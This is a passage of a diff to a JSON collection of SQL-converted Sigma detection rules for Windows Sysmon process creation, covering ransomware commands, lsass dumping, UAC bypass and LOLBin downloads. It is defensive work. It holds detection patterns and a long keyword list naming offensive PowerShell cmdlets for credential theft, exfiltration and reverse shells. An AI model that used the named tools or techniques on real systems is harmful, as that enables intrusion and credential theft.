'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "proc_creation_win_csc_susp_folder.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "car.2013-10-002", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", - "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", - "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "status": "experimental", - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "author": "Sreeman", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - "title": "Procdump Execution", - "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", "status": "experimental", - "description": "Detects usage of the SysInternals Procdump utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use of procdump by a developer or administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_procdump.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "New Root Certificate Installed Via Certutil.EXE", + "id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "proc_creation_win_certutil_certificate_installation.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + "title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1127" ], "falsepositives": [ - "Legitimate use by administrators" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "title": "Conhost Parent Process Executions", + "id": "7dc2dedd-7603-461a-bc13-15803d132355", "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the conhost execution as parent process. Can be used to evaded defense mechanism.", + "author": "omkar72", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND Image LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "proc_creation_win_conhost_susp_child_process.yml" }, { - "title": "Download Arbitrary Files Via PresentationHost.exe", - "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "title": "UAC Bypass via Windows Firewall Snap-In Hijack", + "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_presentationhost_download.yml" + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", - "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE 